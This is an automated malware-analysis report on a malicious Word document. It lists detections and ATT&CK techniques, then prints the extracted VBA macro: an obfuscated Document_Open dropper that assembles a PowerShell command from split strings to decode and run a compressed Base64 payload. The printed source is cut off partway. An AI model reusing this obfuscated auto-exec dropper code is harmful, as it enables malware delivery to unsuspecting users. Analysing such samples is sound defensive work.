MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro's Document_Open subroutine is configured to execute a command using the Shell() function. This command is constructed by concatenating strings to form a PowerShell command that downloads and executes a payload from a remote URL. The ClamAV detection and the presence of the Shell() call strongly indicate a dropper or downloader functionality.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6605015-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6605015-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17401 bytes |
SHA-256: 75268f557293e5166b79613663d331b1b20b41a05795ddea9aec0a4f873cd4fb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "HjpiksqwQw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
qBEEk = 80713 * lFqdc * (44927 + Patsc)
aFWcN = 77619 * mJAkY * (53615 + fzCLR)
dimjj = 21065 * WPdiE * (3724 + tlhVzi)
ADKGv = 8695 * QWITpw * (13197 + JEXwUA)
FtkAvN = 99901 * iATthX * (18269 + TFNmD)
zCrZXkJiRz ("" + sAjlVOF + vqrkERXd + FIdjVd + vCXHXktCKrR + ibKmQwC + kcsvjPvWkz)
zvRcm = 79863 * PSMpR * (51093 + oLHwKc)
IzWbJC = 85242 * Bptbh * (33202 + DNNfz)
End Sub
Attribute VB_Name = "jRNPwrJXUfOkCb"
Function FIdjVd()
On Error Resume Next
BNIFwt = (17117 / AJkjfZ / 97879 * 26505 + (WYjdc * KHctlz + (SEfOW * tlddbT)))
PVHAN = zTjTPY + wwTzXq / 79748 / jERCOU / 74583 - vHKwbv - VtXLNz * MzzHv * (JdEcoR - RqzzTK)
qzFmJWD = "pow" + EaBCMwGz + rIrSFGYziSD + "e" + KMUfwYrD + BuXFtaLWEzNa + "rsh" + XssvKsTIXQ + sTJboXTWqXhBf + "e" + vwjwkluHDf + jSsWHODhsMdJp + "ll " + izKrQkV + nUGEwLGv + "( " + nDzBamcsiiV + dhLHsofI + "NEW" + jjnHzjhGhQLTBl + EnsrqoMNdWmE + "-" + MWcJORnf + zbnKvJfa + "Ob" + jrPTEuWZ + wctZDprsWhz + "J" + jtOACSTr + FXUGIFTuNAAMUi + "EcT" + GRnEbKKj + puUHKlkjoC + " " + jnCmjYKWZjmv + DHVuNoa + " " + ZaFpPbotL + iABoblWJAI + "i"
vIhdL = puIBXd + djuul / 74775 / XnTCFj / 36858 - RQhGSA - jiwcz * cPhdY * (zCbOPW - BHpiXi)
drTQK = TCMvI + FvYmZh / 8791 / ZqCSk / 73570 - CrDbwY - zYNMN * dAOSG * (aGjDEp - FompAj)
JziZiVA = "o.s" + KJUKOwvAY + nsYbjMCLtS + "tR" + lYTUNiMjpELpFw + iKjirWmMPK + "E" + iNRwWKimvbiRM + jjiWkPijjjK + "aM" + lHFCcXCbn + vQJYDcRRJr + "r" + joVZvjiOLCT + VfpofCwTPbUFK + "e" + SszXibZO + GvEwHszJjhwcci + "a" + MRMBTlCb + EvRMwRiqZ + "Der"
VHiXwa = JpPTib + HBEfU / 87116 / BooBsW / 69791 - tmFhPr - iiWLF * GDlMp * (oPdLEN - TSuVE)
OpipjMjtamU = "((N" + wdNBMYwXaII + ukDpCZvQ + "EW" + ATAXqjISItn + XKcZqrDDvaE + "-O" + qfBdROjCMhMA + RpAuWjJfiZzEY + "bJ" + FtvwIsdQic + YKdQYjDlNvf + "EcT" + YKAbiMpTiHnRC + oYVSzFlVBJaVVb + " "
ONJkh = pAPkKt + qwWkI / 94731 / ZNkjmp / 99896 - DrTsU - ZEtOML * VCMvrS * (KEkMd - jAcZz)
WzYQRZ = RudWv + FEKYov / 44523 / HwGHPz / 27757 - bURUj - YdwdS * tPbNR * (PfpEkC - nPwRJ)
TauFA = "I" + sTJFaBsjhbKcJ + XsqWkiiXjOzwz + "o.C" + mbtXBwRI + WzIcZZLrXaZTf + "Om" + JwZqbFvG + jjluvGkAjNjZu + "p" + nEazmTvDQrArS + bsnnqqazbUpT + "rES" + XkBQBoBVHiV + VDvORlvmqmH + "s" + NHwizAvbsHwbRa + lESCKFu + "i" + XhEqjzt + auWclUs + "on" + vwnAKLjFioQ + MSYaTqlM + ".D" + dOzpjJT + HdwjTWWt + "E" + PEjOShDDLBB + mrJmLVwvO + "FL" + jiOjFDwz + uAzzjIfGIwHo + "At"
LvrtTZ = 80992 - QcBoU + cawFnU / WFfGCw / jirzUE / SMASz * (VZjHLX / VHWvK * 56927 / opLnQc)
hkDUPR = 19751 - zmntQ + WXufZZ / MwmqJZ / BMBXfi / wErHGK * (YIXkdr / ntlCW * 23631 / oQdFr)
rJkLX = 25424 - AOYioS + zHFEq / rrLmiM / oGuzs / CrwSk * (OEtmY / sqLJA * 83717 / ziUAw)
bUDHiDBAc = "es" + lQNiEYTDXTOh + PGjiJNSPUJVXJ + "TR" + BPchmXGWv + UqNjIfjAAXZIYz + "EA" + wEMhOfpWDl + QJjkvOs + "m(" + kBqqJmq + EiTBKRi + "[s" + oArfWfijrno + GqTLDWqF + "Y" + uzhQiPwSCpiEbK + LMZvCnsucdh + "st" + MPavBzipO + sVmYbBOIFZ + "EM" + fzwHEmoFhzD + IIaNWowPFC + ".Io" + UTaOYtp + uwEpdCaqmtRv + "." + tnvjkOOau + jTNqIGO + "m" + NKWXtmVZSJPFW + adKFmWTDojtj + "eM" + imDGJFj + qzspIlzBNT + "Or"
sFSnco = 77178 - SuUiUa + dMJQq / Cfjrz / ZOsvId / qfYHIc * (iUIjqO / FwpzTr * 72102 / ZmwfJO)
fwJCR = 87499 - hnzDI + nWMwM / zJEUHt / LRpijP / kzquEs * (cjkqu / QVOmCA * 47534 / FacBIk)
DBSQCz = "y" + MEjjpEFBoJUiWA + zTPCvplCBFmL + "STR" + SRtJUlhvQ + wiiQHCmvwKvB + "e" + WSiijSt + rDoMjPADCW + "AM" + KDltCAQjHWPWGz + NhbqaIr + "]" + qGfvHsfEF + sohSdrOUn + " [" + iwzqVvb + LYaMukk + "c" + kRBlDLYzINi + ZAkXjwQXkc + "ON" + DUNUYsGO + AEztlSV + "vEr" + oJowacWBl + AoSczqKi + "T" + bffWAfapMw + OuzOVnsCqUikCM + "]::" + tuHrDtMiIb + wLZlFDZYckVWlh + "Fr" + BvUotEwR + uVhVGtOw + "omb" + vsiwmNsJZlF + GcNHlDrPH + "as" + JErHibIpczKIQV + Mn
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.